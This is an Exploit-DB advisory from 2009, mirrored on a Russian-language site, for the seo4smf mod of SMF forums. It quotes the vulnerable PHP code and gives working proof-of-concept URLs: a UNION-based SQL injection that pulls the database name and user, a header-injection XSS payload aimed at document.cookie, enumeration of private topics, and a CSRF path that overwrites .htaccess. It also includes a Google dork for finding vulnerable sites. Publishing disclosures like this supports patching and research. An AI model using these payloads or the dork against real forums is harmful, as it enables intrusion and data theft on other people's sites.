- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7723
- Проверка EDB
-
- Пройдено
- Автор
- WHK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2009-01-11
Код:
[1] Inyection SQL
Linea 50 al 63
$query = db_query("
SELECT m.ID_TOPIC, m.subject ,b.ID_BOARD, b.name
FROM {$db_prefix}messages AS m, {$db_prefix}boards AS b
WHERE m.ID_TOPIC = *$topic*
AND m.ID_BOARD = b.ID_BOARD
IMIT 1", __FILE__, __LINE__);
------------------------------------------------------------------------
Linea 105 al 108
$query = db_query("
SELECT name FROM {$db_prefix}boards AS b
WHERE ID_BOARD = *$board*
LIMIT 1", __FILE__, __LINE__);
------------------------------------------------------------------------
Linea 125
$request = db_query("SELECT memberName FROM {$db_prefix}members where
ID_MEMBER=".*$user*." limit 1", __FILE__, __LINE__);
------------------------------------------------------------------------
Linea 143
$request = db_query("SELECT subject FROM {$db_prefix}tp_articles where
id=".*$tpage*." limit 1", __FILE__, __LINE__);
Where:
Linea 7 al 13
$topic = $_GET['t'];
$board = $_GET['b'];
$other = $_GET['o'];
$user = $_GET['u'];
$tpage = $_GET['p'];
$action = $_GET['a'];
$param = $_GET['param'];
Now execute the proof of concept:
http://localhost/smf/seo4smf-redirect.php?t=-1 union select 1,2,3…(numero de columnas)…,concat(username(),database()) –
GoogleDorks: http://www.google.cl/search?hl=es&q=allinurl%3Aseo4smf-redirect.php&btnG=Buscar+con+Google&meta=
[2] Inyection of headers, Cross site Scripting and Path disclosure:
Source:
if(!empty <http://www.php.net/empty>($url)){
header <http://www.php.net/header>('HTTP/1.1 301 Moved Permanently');
header <http://www.php.net/header>('Location: '.$url);
exit <http://www.php.net/exit>;
}
The proof of concept:
http://localhost/seo4smf-redirect.php?a=x%0DLocation:%20javascript:alert(document.cookie);
Real test: http://www.jccharry.com/archivos_publicos/xss_seo4smf.png
Or print the error with path disclosure.
[3] Disclosure in topics:
http://localhost/seo4smf-redirect.php?t=[number 1 to total topics].new/topicseen
This return the privates forumnames and topicnames.
[4] Cross site request forgery and inyection of arbitrary code
Source:
if (isset($_POST['htaccess']))
{
$htaccess = stripslashes($_POST['htaccess']);
//str_replace("\\\\","\\",$htaccess);
file_put_contents($boarddir."/.htaccess", $htaccess);
}
csrf -> .htaccess rewrited -> pwned!
and xml files.
exploits and more in
http://foro.elhacker.net/bugs_y_exploits/falla_en_el_mod_seo4smf_para_smf-t241029.0.html
and
http://www.jccharry.com/blog/2009/01/09/whk_fallas-criticas-en-seo4smf-para-foros-smf-simplemachines-forum.html
-={[unica_inc algún dia estaremos juntos]}=-
# milw0rm.com [2009-01-11]
- Источник
- www.exploit-db.com